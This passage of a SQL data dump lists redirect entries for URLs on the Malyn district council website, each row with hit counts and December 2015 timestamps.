00:00:00',301),(21646,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1114:-lr-&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:41','0000-00-00 00:00:00',301),(21647,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:46','0000-00-00 00:00:00',301),(21648,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1187:2014-01-28-09-43-51&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:52','0000-00-00 00:00:00',301),(21649,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 04:07:54','0000-00-00 00:00:00',301),(21650,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1197:-----l---r------&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:07:56','0000-00-00 00:00:00',301),(21651,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1083:-2014-&Itemid=94&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:07:59','0000-00-00 00:00:00',301),(21652,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=863:------qq&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:08:01','0000-00-00 00:00:00',301),(21653,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:10','0000-00-00 00:00:00',301),(21654,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=530:-4050-vi-l-r-1-2013-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:12','0000-00-00 00:00:00',301),(21655,'http://www.malyn-rayrada.org.ua/index.php?catid=30:--30122010-&id=228:-2011-&Itemid=61&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:35','0000-00-00 00:00:00',301),(21656,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=191:2010-12-15-13-27-06&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:38','0000-00-00 00:00:00',301),(21657,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1085:2013-09-11-12-15-54&Itemid=94&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:08:42','0000-00-00 00:00:00',301),(21658,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=766:2012-09-28-08-37-31&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:08:44','0000-00-00 00:00:00',301),(21659,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1093:------------2017-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:54','0000-00-00 00:00:00',301),(21660,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1203:--------------------2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:56','0000-00-00 00:00:00',301),(21661,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1022:-lr-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:08:59','0000-00-00 00:00:00',301),(21662,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=671:2012-05-09-13-09-05&lang=uk&option=com_content&view=article','','','',6,0,'2015-12-11 04:09:03','0000-00-00 00:00:00',301),(21663,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=634:-2016-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:08','0000-00-00 00:00:00',301),(21664,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=349:--------20--2011--108-l---r&Itemid=68&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:10','0000-00-00 00:00:00',301),(21665,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:17','0000-00-00 00:00:00',301),(21666,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=471:2011-11-21-08-33-43&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:23','0000-00-00 00:00:00',301),(21667,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=712:2012-06-14-15-11-24&Itemid=82&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:09:33','0000-00-00 00:00:00',301),(21668,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=840:-2007-2015-&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:39','0000-00-00 00:00:00',301),(21669,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=525:2011-12-30-10-19-27&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:42','0000-00-00 00:00:00',301),(21670,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1071:2013-08-27-14-06-18&Itemid=14&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 04:09:46','0000-00-00 00:00:00',301),(21671,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:49','0000-00-00 00:00:00',301),(21672,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:52','0000-00-00 00:00:00',301),(21673,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:--24--6-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:09:55','0000-00-00 00:00:00',301),(21674,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1143:2013-11-26-13-23-37&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:10:07','0000-00-00 00:00:00',301),(21675,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=649:-2011-2015-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:10:12','0000-00-00 00:00:00',301),(21676,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=765:-qq&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:10:21','0000-00-00 00:00:00',301),(21677,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:10:23','0000-00-00 00:00:00',301),(21678,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=525:2011-12-30-10-19-27&Itemid=73&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 04:10:35','0000-00-00 00:00:00',301),(21679,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1174:-2013-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:10:37','0000-00-00 00:00:00',301),(21680,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:10:39','0000-00-00 00:00:00',301),(21681,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:10:48','0000-00-00 00:00:00',301),(21682,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=203:2010-12-15-14-10-45&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:10:55','0000-00-00 00:00:00',301),(21683,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=561:2012-02-02-08-58-39&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:11:10','0000-00-00 00:00:00',301),(21684,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:11:15','0000-00-00 00:00:00',301),(21685,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1052:2013-07-19-11-32-33&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:11:17','0000-00-00 00:00:00',301),(21686,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1138:-15112013&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:11:31','0000-00-00 00:00:00',301),(21687,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1317:2014-05-25-18-25-09&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 04:11:41','0000-00-00 00:00:00',301),(21688,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=682:-2012-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:11:49','0000-00-00 00:00:00',301),(21689,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1113:2013-10-23-09-26-07&Itemid=94&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:11:51','0000-00-00 00:00:00',301),(21690,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=766:2012-09-28-08-37-31&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 04:11:54','0000-00-00 00:00:00',301),(21691,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:12:05','0000-00-00 00:00:00',301),(21692,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1317:2014-05-25-18-25-09&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 04:12:13','0000-00-00 00:00:00',301),(21693,'http://www.malyn-rayrada.org.ua/index.php?id=50&Itemid=90&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 04:12:17','0000-00-00 00:00:00',301),(21694,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 04:12:24','0000-00-00 00:00:00',301),(21695,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1192:-2014-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:12:31','0000-00-00 00:00:00',301),(21696,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1188:2014-01-28-09-45-21&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:12:40','0000-00-00 00:00:00',301),(21697,'http://www.malyn-rayrada.org.ua/index.php?id=47:-21022013-&Itemid=86&lang=uk&layout=blog&limitstart=25&option=com_content&view=category','','','',2,0,'2015-12-11 04:12:43','0000-00-00 00:00:00',301),(21698,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 04:13:02','0000-00-00 00:00:00',301),(21699,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1079:------l---2011-2013-r&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:05','0000-00-00 00:00:00',301),(21700,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=751:-15-6-&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:13:14','0000-00-00 00:00:00',301),(21701,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=507:2011-12-19-17-10-52&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:24','0000-00-00 00:00:00',301),(21702,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=318:-2007-2011&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:34','0000-00-00 00:00:00',301),(21703,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=631:-i-2012-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:41','0000-00-00 00:00:00',301),(21704,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1070:2013-08-23-04-27-00&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:47','0000-00-00 00:00:00',301),(21705,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=929:2013-02-21-09-11-26&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:50','0000-00-00 00:00:00',301),(21706,'http://www.malyn-rayrada.org.ua/index.php?catid=44&id=756:-2012-&Itemid=83&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:13:52','0000-00-00 00:00:00',301),(21707,'http://www.malyn-rayrada.org.ua/index.php?id=42&Itemid=80&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 04:13:59','0000-00-00 00:00:00',301),(21708,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=965:2013-03-14-10-56-03&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:04','0000-00-00 00:00:00',301),(21709,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 04:14:11','0000-00-00 00:00:00',301),(21710,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:16','0000-00-00 00:00:00',301),(21711,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=318:-2007-2011&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:18','0000-00-00 00:00:00',301),(21712,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=515:2011-12-22-10-09-17&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:20','0000-00-00 00:00:00',301),(21713,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1035:2013-06-25-09-55-31&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:14:30','0000-00-00 00:00:00',301),(21714,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1317:2014-05-25-18-25-09&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 04:14:32','0000-00-00 00:00:00',301),(21715,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=866:2012-12-14-06-58-01&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:36','0000-00-00 00:00:00',301),(21716,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=716:2012-06-14-15-19-24&Itemid=82&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 04:14:45','0000-00-00 00:00:00',301),(21717,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=843:-l-r&Itemid=85&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 04:14:48','0000-00-00 00:00:00',301),(21718,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=609:-q-q&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:50','0000-00-00 00:00:00',301),(21719,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:14:59','0000-00-00 00:00:00',301),(21720,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1058:-2013-&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:15:01','0000-00-00 00:00:00',301),(21721,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=720:-l-r&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:15:04','0000-00-00 00:00:00',301),(21722,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1072:-24-6-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 04:16:59','0000-00-00 00:00:00',301),(21723,'http://www.malyn-rayrada.org.ua/index.php?id=36:2011-07-21-07-51-53&Itemid=70&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 04:18:45','0000-00-00 00:00:00',301),(21724,'http://www.malyn-rayrada.org.ua/index.php?catid=21&id=27:2010-06-07-11-05-24&Itemid=47&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:23:57','0000-00-00 00:00:00',301),(21725,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=279:2011-03-31-08-20-23&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 04:24:05','0000-00-00 00:00:00',301),(21726,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=969:-2013-&Itemid=85&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 04:24:08','0000-00-00 00:00:00',301),(21727,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=521:-2012-&Itemid=73&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 04:24:10','0000-00-00 00:00:00',301),(21728,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=ru','','','',5,0,'2015-12-11 04:37:30','0000-00-00 00:00:00',301),(21729,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-12-11 06:20:41','0000-00-00 00:00:00',301),(21730,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=583:-l-lr&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 07:58:51','0000-00-00 00:00:00',301),(21731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45:--14112012-&Itemid=84&lang=en','','','',6,0,'2015-12-11 10:11:22','0000-00-00 00:00:00',301),(21732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=uk','','','',7,0,'2015-12-11 11:52:57','0000-00-00 00:00:00',301),(21733,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=453:-lr-90-&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-12-11 15:23:59','0000-00-00 00:00:00',301),(21734,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38&Itemid=73&lang=uk','','','',2,0,'2015-12-11 15:52:34','0000-00-00 00:00:00',301),(21735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=83:2010-08-05-12-21-54&catid=11:2010-06-05-14-33-33&Itemid=16&lang=uk','','','',9,0,'2015-12-11 17:48:13','0000-00-00 00:00:00',301),(21736,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&id=38:--19122011-&lang=ru&layout=blog&limitstart=35&option=com_content&view=category','','','',2,0,'2015-12-11 19:36:33','0000-00-00 00:00:00',301),(21737,'http://malyn-rayrada.org.ua/index.php/1126-viddil-statistiki-u-malinskomu-rajoni-informue-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-traven-2015-roku','','','',10,0,'2015-12-12 02:27:11','0000-00-00 00:00:00',301),(21738,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=863:-qq&lang=en&option=com_content&view=article','','','',5,0,'2015-12-12 03:23:47','0000-00-00 00:00:00',301),(21739,'http://malyn-rayrada.org.ua/index.php/1191-dopomozheno-dityam-razom?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-12 04:23:30','0000-00-00 00:00:00',301),(21740,'http://malyn-rayrada.org.ua/index.php/1192-u-chajki-bronza-v-urozhayu-novij-stadion?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-12 04:23:33','0000-00-00 00:00:00',301),(21741,'http://malyn-rayrada.org.ua/index.php/549-za-materialami-zvernen-rajonnoi-radi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-12 04:23:41','0000-00-00 00:00:00',301),(21742,'http://malyn-rayrada.org.ua/index.php/552-u-fedorivci-rozpochali-robotu-po-navedennju','','','',4,0,'2015-12-12 04:23:43','0000-00-00 00:00:00',301),(21743,'http://malyn-rayrada.org.ua/index.php/554-rekonstrukcii-stadionu-avangard-buti?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-12 04:23:44','0000-00-00 00:00:00',301),(21744,'http://malyn-rayrada.org.ua/index.php/559-i-u-ditej-ih-batkiv-ta-vchiteliv-bude-svjato','','','',4,0,'2015-12-12 04:23:46','0000-00-00 00:00:00',301),(21745,'http://malyn-rayrada.org.ua/index.php/570-ogoloshennja_6?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-12 04:23:49','0000-00-00 00:00:00',301),(21746,'http://malyn-rayrada.org.ua/index.php/575-vidbulas-22-sesija-malinskoi-rajonnoi-radi','','','',4,0,'2015-12-12 04:23:50','0000-00-00 00:00:00',301),(21747,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1190-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-tov-yunigran','','','',7,0,'2015-12-12 04:24:03','0000-00-00 00:00:00',301),(21748,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/148-pro-priznachennja-kerivnika-komunalnogo?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 04:25:03','0000-00-00 00:00:00',301),(21749,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/59-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_2','','','',6,0,'2015-12-12 04:25:05','0000-00-00 00:00:00',301),(21750,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/59-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 04:25:06','0000-00-00 00:00:00',301),(21751,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/288-pro-zvit-redaktora-gazeti-malinski-novini-pro?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 04:25:21','0000-00-00 00:00:00',301),(21752,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/177-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_6','','','',7,0,'2015-12-12 04:25:36','0000-00-00 00:00:00',301),(21753,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/178-pro-spisannja-osnovnih-zasobiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 04:25:39','0000-00-00 00:00:00',301),(21754,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=14','','','',6,0,'2015-12-12 04:25:44','0000-00-00 00:00:00',301),(21755,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011?start=21','','','',6,0,'2015-12-12 04:25:45','0000-00-00 00:00:00',301),(21756,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/866-pro-pogodzhennya-zvilnennya-ta-priznachennya-na-posadi-direktoriv-shkil-rajonu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-12 04:26:12','0000-00-00 00:00:00',301),(21757,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/867-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-15-grudnya-2010-roku-12-pro-utvorennya-prezidiji-rajonnoji-radi','','','',4,0,'2015-12-12 04:26:14','0000-00-00 00:00:00',301),(21758,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/867-pro-vnesennya-zmin-do-rishennya-rajonnoji-radi-vid-15-grudnya-2010-roku-12-pro-utvorennya-prezidiji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-12 04:26:15','0000-00-00 00:00:00',301),(21759,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/868-pro-peredachu-nerukhomogo-majna?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-12 04:26:17','0000-00-00 00:00:00',301),(21760,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014?start=7','','','',5,0,'2015-12-12 04:26:25','0000-00-00 00:00:00',301),(21761,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/995-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-12 04:26:31','0000-00-00 00:00:00',301),(21762,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/996-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-12 04:26:34','0000-00-00 00:00:00',301),(21763,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/998-pro-zatverdzhennya-poryadku-i-normativiv-vidrakhuvannya-chastini-pributku-dokhodu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-12 04:26:37','0000-00-00 00:00:00',301),(21764,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku?start=14','','','',6,0,'2015-12-12 04:26:41','0000-00-00 00:00:00',301),(21765,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1010-pro-zatverdzhennya-zvitu-pro-vikonannya-rajonnogo-byudzhetu-za-2014-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 04:26:44','0000-00-00 00:00:00',301),(21766,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=702:--------------------2011-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-12-12 04:29:42','0000-00-00 00:00:00',301),(21767,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=555:2012-01-27-13-50-13&catid=39&Itemid=76&lang=uk','','','',10,0,'2015-12-12 08:07:49','0000-00-00 00:00:00',301),(21768,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/89-pro-hid-vikonannja-rajonnoi-programi_2','','','',12,0,'2015-12-12 11:08:40','0000-00-00 00:00:00',301),(21769,'http://malyn-rayrada.org.ua/index.php/579-ogoloshennja_7','','','',5,0,'2015-12-12 13:22:13','0000-00-00 00:00:00',301),(21770,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 13:22:21','0000-00-00 00:00:00',301),(21771,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/88-pro-hid-vikonannja-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-12 16:22:11','0000-00-00 00:00:00',301),(21772,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/92-pro-hid-vikonannja-cilovoi-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-12 16:22:13','0000-00-00 00:00:00',301),(21773,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/419-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-12 16:22:25','0000-00-00 00:00:00',301),(21774,'http://www.malyn-rayrada.org.ua/attachments/article/945/Матеріали Буркуш.pdf','','','',2,0,'2015-12-12 21:09:14','0000-00-00 00:00:00',301),(21775,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk','','','',2,0,'2015-12-12 21:14:55','0000-00-00 00:00:00',301),(21776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-12-13 00:17:13','0000-00-00 00:00:00',301),(21777,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/598-pro-pogodzhennja-priznachennja-na-posadu-direktora_3','','','',5,0,'2015-12-13 03:50:05','0000-00-00 00:00:00',301),(21778,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/629-pro-peredachu-budivli-lokomotivnogo-depo-na-balans','','','',7,0,'2015-12-13 03:50:22','0000-00-00 00:00:00',301),(21779,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/651-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_22','','','',7,0,'2015-12-13 03:52:13','0000-00-00 00:00:00',301),(21780,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/474-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_5','','','',5,0,'2015-12-13 03:53:09','0000-00-00 